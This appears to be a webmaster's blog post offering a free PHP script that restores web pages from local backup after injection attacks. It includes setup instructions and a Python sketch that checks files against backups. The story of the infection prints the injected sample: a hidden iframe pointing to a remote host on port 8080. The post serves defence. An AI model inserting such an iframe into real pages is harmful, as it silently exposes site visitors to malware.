Injection attack protector
Here is a little piece of software that will effectively protect your web page against so-called injection attacks, which are bound to happen to your web page sooner or later. It’s free to download and free to use. If you have a question, please ask. And trust me on this one: no1’s ones are safe (and neither are one’s zeroes), resistance is futile and all our bases are belong to us! And of course, there’s a story to it, so keep reading …
A while ago a friend of mine asked me to check his web page, as his visitors complained about it being infected with a virus or something. Since I was logged into my Google account at the time, an attempt at visiting the page was blocked by a warning page stating that the site had been attacked. I was dumb enough to proceed to the page anyway, and luckily my AVG anti-virus promptly detected malware code and prevented me from even seeing the page. I had to download the infected page via FTP, and again AVG killed the file mid-air, so to see the infected file I had to rename it on the server and smuggle it behind AVG’s back. And there it was, injected just after the body tag, a hidden iframe pointing to a page in China. Like this one:
<iframe src="http://thisorthat.cn:8080/index.php" width=154 height=115 style="visibility: hidden"></iframe>
Didn’t bother following the link to find what monsters inhabit mainland China. Just cleaned out the suspicious code, uploaded and renamed the file, went to Google webmaster tools to request another page health check, waited a few hours, revisited the page, cleaned all subsequent reinfections, went to webmaster central, requested another health check, … You get the picture. All the fun you can imagine. The host master in charge of the web server where the injections occurred was no help either and was only repeating that he is not the one to blame.
A web search for injection attack returned a few pages with no useful info on how to protect against such attacks, except urging webmasters to use strong passwords and secure connections (which helps BTW, but not always), although it was quite clear that injections are fairly common. And when you know what to look for, you are likely to find out that most hosting providers are vulnerable and, what’s worse, in denial of the imminent threat.
Files most likely to be injected are all index*.* and default*.* (.php, .htm, .html, .asp), so protecting these files is what we are after. Webprotector.php monitors selected files on the web server and restores them from a healthy local backup (which should be backed up and monitored by a proven and up-to-date anti-malware) when (there’s no doubt it is when, not if) they are tampered with. It works in interactive mode or as a shell script under Linux.
Instructions
Script name: webprotector.php – blind brute force web page injection attack protector
Description: protects a list of web pages and files that are likely to be targeted by an injection attack by restoring files from local backup whenever they are modified
- extract files from webprotector.zip into a protected web page folder of your choice which ONLY YOU can access
- edit xinject.lst to create a list of web pages and files, like:
-
www.domain.tld/,
ftp://user:password@ftpserver/www.domain.tld/,
local_backup_folder_for_domain.tld,
index.php:
subfolder/index.php:
anothersubfolder/index.html:
;
www.another_domain.tld/,
ftp://user:password@ftpserver/another_domain/,
local_backup_folder_for_another_domain,
index.php:
somesubfolder/default.html:
;
-
- point your browser to webprotector.php on your web server and use scan to check and tune your settings
- use form at the bottom of the page to test and tune parts of your list
- use heal to periodically check and heal protected pages and files
- create a script like the following one to schedule checking and healing
cd /home/webpage/protector/
/usr/bin/php webprotector.php script
- Note: the script parameter prevents any output and at the same time enables file restoration (like heal in interactive mode). Recommended schedule is at least every 15 minutes, but not more often than every 5 minutes
- consider ordering an original limited edition print
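A sketch of the check the list drives, added here as an example (not webprotector.php's own code): it parses the xinject.lst layout shown above and reports protected files whose live bytes differ from the local backup. The parsing rules are inferred from the sample list, and fetch and backup_root are hypothetical names for how the live copy is retrieved (for instance over FTP) and where the backup folders sit.

```python
import hashlib
from pathlib import Path

# Constructed sample in the xinject.lst layout shown in the instructions.
SAMPLE_LIST = """
www.domain.tld/,
ftp://user:password@ftpserver/www.domain.tld/,
local_backup_folder_for_domain.tld,
index.php:
subfolder/index.php:
;
www.another_domain.tld/,
ftp://user:password@ftpserver/another_domain/,
local_backup_folder_for_another_domain,
index.php:
;
"""

def parse_list(text):
    """Split the list into site records: ';' ends a record, ',' ends each of
    the three header fields, ':' ends each protected file path. Assumes the
    FTP password itself contains no ',' or ';'."""
    sites = []
    for record in text.split(";"):
        if not record.strip():
            continue
        parts = record.split(",", 3)  # the FTP URL contains ':', so split on ',' first
        if len(parts) != 4:
            raise ValueError("malformed record: %r" % record.strip())
        url, ftp, backup, files = (p.strip() for p in parts)
        paths = [f.strip() for f in files.split(":") if f.strip()]
        sites.append({"url": url, "ftp": ftp, "backup": backup, "files": paths})
    return sites

def find_tampered(site, fetch, backup_root="."):
    """Return protected paths whose live bytes differ from the backup copy.
    fetch(site, path) -> bytes is a caller-supplied hook (hypothetical)."""
    tampered = []
    for path in site["files"]:
        good = (Path(backup_root) / site["backup"] / path).read_bytes()
        if hashlib.sha256(fetch(site, path)).digest() != hashlib.sha256(good).digest():
            tampered.append(path)
    return tampered
```

Because the list carries FTP passwords in clear text, the folder holding it needs the same access restriction the first instruction asks for.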
Note
When webprotector.php fails to restore healthy pages, it uses the wput command, which you must download and install separately from SourceForge. Webprotector.php calls wput from /usr/local/bin, so put it there or adjust the path in webprotector.php.
Absence of style
This is a blind brute force approach to protecting any web page against various injection attacks, flood, fire, insane acts of bad fortune, terminal diseases, common flu, bad taste, … and so on. It may not demonstrate luxurious amounts of class, elegance, or style, but it gets the job done!
Download webprotector


